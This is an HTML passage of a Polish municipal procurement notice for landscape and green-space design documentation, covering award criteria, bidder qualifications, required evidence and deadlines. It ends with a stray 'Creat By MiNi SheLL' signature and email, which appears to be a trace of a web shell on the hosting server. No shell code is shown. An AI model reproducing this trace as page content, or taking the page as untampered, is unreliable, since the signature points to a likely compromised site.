<h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>W celu potwierdzenia warunku Wykonawca winien wykazać:<br/>a)	wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - minimum dwóch dokumentacji projektowych, które obejmowały swoim zakresem zagospodarowanie terenów zieleni w przestrzeni publicznej o powierzchni minimum 1 000 m2 każda, w tym co najmniej jedną dokumentację projektową, która obejmowała swym zakresem zagospodarowanie terenów zieleni w przestrzeni publicznej wraz z obiektem małej architektury typu element wodny,<br/>b)	co najmniej po jednej osobie skierowanej do realizacji zamówienia posiadającej uprawnienia budowlane do projektowania w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 z późn. zm.) lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów albo uprawnioną do sprawowania samodzielnych funkcji na podstawie odrębnych przepisów prawa w specjalności: <br/>	architektonicznej,<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>c)	jedną osobę skierowaną do realizacji zamówienia posiadającą tytuł mgr inż. architektury krajobrazu, która wykonała co najmniej dwie dokumentacje projektowe zieleni w przestrzeni publicznej o powierzchni minimum 1 000 m2 każda. 1)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek <br/>udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej określony w pkt 1 <br/>ppkt 4 lit. a SWZ - zostanie uznany za spełniony, jeżeli jeden z członków konsorcjum wykaże się wykonaniem zamówień wymaganych w pkt 1 ppkt 4 lit. a SWZ (zapis stosuje się odpowiednio <br/>w przypadku polegania na podmiotach udostępniających zasoby).<br/>2)	Zamawiający dopuszcza wskazanie jednej osoby posiadającej uprawnienia budowlane, wykształcenie i doświadczenie wymagane w pkt 1 ppkt 4 lit. b-c SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca składa oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego.2. Zamawiający żąda od Wykonawcy, który polega na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia<br/>oświadczenia wymienionego w pkt 1, dotyczącego tych podmiotów, potwierdzającego, że nie zachodzą<br/>wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie warunku dotyczącego zdolności technicznej lub zawodowej:<br/>1) wykaz usług wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane (na lub wg zał. nr 3 do SWZ), oraz załączeniem dowodów określających, czy<br/>te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie Wykonawcy;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień,<br/>wykształcenia, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (na<br/>lub wg zał. nr 4 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w celu<br/>potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (na lub wg zał. nr 2 do SWZ) -<br/>składa każdy Wykonawca do oferty,<br/>2) oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - składa<br/>każdy z Wykonawców do oferty,<br/>3) oświadczenie, o którym mowa w rozdz. VIII pkt 1 SWZ - składa każdy z Wykonawców na<br/>wezwanie Zamawiającego,<br/>4) dokumenty, o których mowa w rozdz. IX SWZ - składa odpowiednio Wykonawca, który<br/>wykazuje spełnienie warunku, w zakresie i na zasadach opisanych odpowiednio w rozdz. V SWZ<br/>- na wezwanie Zamawiającego.<br/>2. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu polega na zdolnościach podmiotów udostępniających zasoby, zobowiązany jest<br/>dołączyć do oferty:<br/>1) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby, o którym mowa w art. 125 ust. 1 ustawy Pzp (na<br/>lub wg zał. nr 2 do SWZ),<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (na lub wg zał. nr 5 do SWZ) lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu,<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności<br/>dotyczą.<br/>3. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy – nie dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektem umowy - stanowiącym zał. nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.miastobialystok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com